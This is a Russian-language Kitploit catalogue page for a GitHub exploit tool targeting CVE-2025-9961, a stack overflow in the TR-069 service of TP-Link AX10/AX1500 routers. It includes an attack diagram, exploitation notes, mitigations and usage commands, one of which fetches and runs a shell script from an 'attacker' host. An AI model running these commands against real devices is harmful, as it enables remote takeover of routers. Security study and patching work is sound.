Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-9961 — Эксплойт для переполнения буфера стека TP-Link AX10/AX1500 в CWMP (TR-069), позволяющий удаленное выполнение кода через ret2libc с обходом ASLR. Включает режимы только проверки, DoS и выполнения команд. | Kitploit
Инструменты/GitHubGitHub/yt2w/cve-2025-9961
Безопасность встроенных системБезопасность IoTАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеАппаратная БезопасностьИнструмент Удаленного ДоступаЭксплуатация Бинарных Файлов
GitHubyt2w/cve-2025-9961

CVE-2025-9961

Эксплойт для переполнения буфера стека TP-Link AX10/AX1500 в CWMP (TR-069), позволяющий удаленное выполнение кода через ret2libc с обходом ASLR. Включает режимы только проверки, DoS и выполнения команд.

6138 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий

CVE-2025-9961

TP-Link AX10/AX1500 CWMP Переполнение буфера RCE

Обзор

Переполнение стека буфера в CWMP (TR-069), приводящее к удаленному выполнению кода.

ПолеЗначение
ПродуктTP-Link AX10, AX1500
Затронутые версииAX10 < 1.2.1, AX1500 < 1.3.11
CVSS8.6 (Высокий)
ТипПереполнение стека буфера
ВекторCWMP/TR-069 (порт 7547)
ВоздействиеУдаленное выполнение кода

Схема атаки

root@kitploit:~
flowchart LR
    A[Attacker] --> B["Malicious ACS"]
    B --> C["SetParameterValues"]
    C --> D["Stack Overflow"]
    D --> E["Overwrite PC"]
    E --> F["ret2libc"]
    F --> G["system()"]
    G --> H["RCE"]

Технические детали

Уязвимость находится в процессе cwmp при обработке SOAP-запросов SetParameterValues. Входные данные используются для вычисления размера буфера без проверки границ.

Эксплуатация:

  • Используйте ret2libc для вызова system()
  • Обход ASLR путем перебора
  • Перезапуск службы позволяет повторять попытки

Использование

root@kitploit:~
python exploit.py <target_ip> --check-only

python exploit.py 192.168.0.1 --dos

python exploit.py 192.168.0.1 -c "wget http://attacker/shell.sh -O /tmp/s; sh /tmp/s"

Параметры

Требования

Нет (использует стандартную библиотеку)

Меры защиты

  • Обновите прошивку с исправлением
  • Отключите TR-069/CWMP
  • Ограничьте доступ к порту 7547

Отказ от ответственности

Только для авторизованного тестирования безопасности.

Скачать инструмент
ФлагОписаниеПо умолчанию
-p, --portПорт CWMP7547
-c, --commandКоманда для RCEнет
-t, --timeoutТаймаут сокета10
--dosТолько режим DoSвыкл
--check-onlyПроверить уязвимостьвыкл